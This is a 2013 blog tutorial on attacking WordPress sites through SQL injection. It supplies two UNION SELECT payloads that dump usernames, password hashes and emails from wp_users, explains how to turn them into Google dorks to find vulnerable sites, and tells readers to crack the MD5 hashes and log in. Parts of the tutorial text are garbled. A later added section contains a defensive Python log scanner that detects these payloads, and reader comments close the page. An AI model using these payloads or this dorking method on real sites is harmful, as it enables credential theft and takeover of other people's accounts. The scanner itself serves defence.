
Wednesday, 7 August 2013

WordPress SQL Injection Hacks

WordPress SQL Injection Hacks: Another Special Post :-)

There are millions of sites hosted on WordPress, and I have already posted some tutorials on WordPress hacking, which you can check here. This is a new tutorial on WordPress hacking with SQL injections. Let's see.

How to use it?

For example, the first injection is "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*

Now modify it into a Google dork. To make the dork, use "Inurl:injection's php or dire here"; for example, for this injection the dork will be "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php".

Now go to and type your modified dork and see the search result. The search result will be like this for dork

Remove the words after iframe.php and put your SQL injection here ... now the URL will be,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--

You will get the user name and MD5-coded password ... Crack the password using MD5 decoding tools and log in here

Note: The process is the same for all injections ... comment below if you have any doubt.
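Seen from the defending side, both request strings quoted above leave a recognisable trace in web-server access logs. The following Python code is an added example, not part of the original post: it decodes each request's query string and flags UNION SELECT queries, separately marking those that name the WordPress user table or its credential columns. The log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Client address and request target from a combined-format access log line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
# WordPress user table (any table prefix) and its credential columns.
CRED_RE = re.compile(r"\b(?:\w+_users|user_pass|user_login|user_email)\b")

def normalize(query):
    """Undo up to three layers of URL encoding, collapse whitespace, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).lower()

def classify(line):
    """Return (client, path, verdict) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    query = normalize(url.query)
    if not UNION_RE.search(query):
        verdict = "ok"
    elif CRED_RE.search(query):
        verdict = "sqli-credential-dump"
    else:
        verdict = "sqli-union"
    return client, url.path, verdict

def scan(lines):
    """Return only the requests that look like UNION-based injection."""
    hits = [classify(line) for line in lines]
    return [h for h in hits if h and h[2] != "ok"]

# Constructed sample log; the two flagged requests reuse the strings quoted in the post.
SAMPLE_LOG = [
    '198.51.100.20 - - [07/Aug/2013:10:11:58 +0000] "GET /?s=credit+union+hours HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Aug/2013:10:12:01 +0000] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users-- HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [07/Aug/2013:10:12:09 +0000] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* HTTP/1.1" 200 388 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [07/Aug/2013:10:12:15 +0000] "GET /index.php?cat=5 HTTP/1.1" 200 10233 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, path, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:22} {client:15} {path}")
```

A hit on a plugin path that does not exist on the site is still worth recording, since it shows the client is working through a list of known injection strings.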



  1. It works only if the user has that plugin; otherwise it won't work

  2. NO!! It works, it doesn't matter whether you have the plugin or not, try it

  3. Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!